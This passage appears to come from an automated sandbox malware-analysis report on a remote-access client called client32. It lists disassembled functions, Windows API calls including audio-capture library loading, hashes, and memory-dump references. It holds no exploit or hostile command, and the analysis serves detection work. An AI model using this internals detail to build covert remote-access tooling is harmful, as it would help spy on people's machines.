                                                                                                                                                                                                    • Opcode ID: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                                                                                                    • Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0
                                                                                                                                                                                                    Function 11027510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetCloseHandle), ref: 11027524
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,110297FB,1117B47B), ref: 11027541
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                                                                    • Opcode ID: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction ID: 0efa5e4b185ac2da0920bc638d9d3d9410d8270d4334fbfed3ee5fbf9e412b31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E09272A007345BC320DFA9E844A46F7E8DB24765F40453BEA4197200C670E4448BE0
                                                                                                                                                                                                    Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                                                                    • Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1
                                                                                                                                                                                                    Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                                                                    • Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1
                                                                                                                                                                                                    Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                                                                    • Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0
                                                                                                                                                                                                    Function 1101D070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D086
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2663631564-2830328467
                                                                                                                                                                                                    • Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1
                                                                                                                                                                                                    Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                                                                                    • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                                                                                                    Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    • Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390
                                                                                                                                                                                                    Function 1100D4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(1100D73E,?), ref: 1100D4C9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D4D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
